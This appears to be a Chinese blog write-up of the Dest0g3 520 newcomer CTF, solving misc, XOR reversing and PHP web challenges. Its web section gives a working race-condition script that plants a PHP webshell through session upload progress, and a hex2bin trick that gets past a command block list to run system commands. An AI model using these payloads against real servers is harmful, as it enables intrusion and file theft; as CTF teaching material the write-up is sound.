Dest0g3 520迎新赛

警告
本文最后更新于 2023-01-29,文中内容可能已过时。

misc

Welcome to fxxking DestCTF

关注公众号

image-20220520142702658

Pngenius

image-20220520142506683

zsteg一把梭

binwalk分离压缩包 密码是Weak_Pas5w0rd

EasyEncode

压缩包 爆破密码

image-20220520142717623

然后morse hex unicode base64套娃

cyberchef一把梭

image-20220520142853568

RE

simpleXOR

image-20220520150925576

提取出来result_0

然后异或247-i

1
2
3
4
5
result = [179,145,130,128,195,155,206,117,207,156,154,133,133,205,184,132,170,125,189,187,177,181,150,113,141,158,134,191,115,168,163,156,131,101,158,87]

for i in range(len(result)):

  print(chr(((result[i])^247)-i),end='')

Dest0g3{0bcgf-AdMy892-KobPW-hB6LTqG}

WEB

phpdest

开了半个小时开的靶机还进不去

又开了半个小时

1
2
3
4
5
6
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
    require_once($_GET['file']);
}

wmctf2020的原题

文件上传+条件竞争 直接上脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
import io
import threading

url = "http://60bc6809-4970-417b-93c2-c2f9abe7c6d7.node4.buuoj.cn:81/"
sessionID = "flag"
data = {"cmd": "system('cat flag.php');"}
def write(session):
    while True:
        f = io.BytesIO(b'a'*1024*50)
        resp = session.post(url=url,data={'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST["cmd"]);?>'},files={'file':('flag.txt',f)},cookies={'PHPSESSID':sessionID})
def read(session):
    while True:
        resp = session.post(url='http://60bc6809-4970-417b-93c2-c2f9abe7c6d7.node4.buuoj.cn:81/?file=/tmp/sess_flag',data=data)
        if 'flag.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("=========retry==========")
if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1,5):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1,5):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

EasyPHP

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
<?php
highlight_file(__FILE__);
include "fl4g.php";
$dest0g3 = $_POST['ctf'];
$time = date("H");
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){
    echo $fl4g;
}else{
    echo "Try harder!";
}
set_error_handler(
    function() use(&$fl4g) {
        print $fl4g;
    }
);
$fl4g .= $dest0g3;
?>

报错回显

post传个数组就行

1
ctf[]=1000

SimpleRCE

1
2
3
4
5
6
7
<?php
highlight_file(__FILE__);
$aaa=$_POST['aaa'];
$black_list=array('^','.','`','>','<','=','"','preg','&','|','%0','popen','char','decode','html','md5','{','}','post','get','file','ascii','eval','replace','assert','exec','$','include','var','pastre','print','tail','sed','pcre','flag','scan','decode','system','func','diff','ini_','passthru','pcntl','proc_open','+','cat','tac','more','sort','log','current','\\','cut','bash','nl','wget','vi','grep');
$aaa = str_ireplace($black_list,"hacker",$aaa);
eval($aaa);
?>

绕过滤

hex2bin绕构造system

image-20220520164649376

发现flag在根目录

head输出

1
aaa=hex2bin('73797374656d')('head /*');
0%